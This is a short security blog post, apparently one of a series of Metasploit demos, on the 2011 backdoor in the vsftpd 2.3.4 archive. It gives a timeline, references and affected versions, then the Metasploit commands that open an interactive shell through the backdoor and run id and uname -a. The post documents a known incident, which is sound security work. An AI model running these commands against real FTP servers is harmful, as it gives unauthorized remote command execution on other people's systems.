aka wow on ZATAZ.com
vsftpd v2.3.4 Backdoor Command Execution
Timeline :
Backdoor discovered by Mathias Kresin
Source code correction the 2011-07-03
Metasploit exploit released the 2011-07-04
PoC provided by :
hdm
mc
Reference(s) :
OSVDB-73573
Diff Pastbin
vsftpd alert
Affected version(s) :
vsftpd-2.3.4 from 2011-06-30 to 2011-07-03
Tested on Ubuntu Lucid 10.04.1 LTS with :
vsftpd-2.3.4
Description :
This module exploits a malicious backdoor that was added to the vsftpd download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
Commands :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploitid
uname -a
I recommend you to read these related posts
- OSVDB-69562 : ProFTPD 1.3.3c Backdoor Command Execution
- CVE-2010-3867 : ProFTPD IAC Remote Root Exploit
- CVE-2010-3867 : You wanna play with ProFTPD ?
- SUC028 : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)
- Anonymous FTP scanning differences between Metasploit and Nmap
- IIS5 & 6 FTP Stack Overflow 0day
- SUC020 : Potential FTP non anonymous Login and/or Brute-Force attempt
- CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor Metasploit Demo
- CVE-2012-0209 Horde 3.3.12 Backdoor Metasploit Demo
- MyBB 1.6.4 Backdoor Metasploit Demo
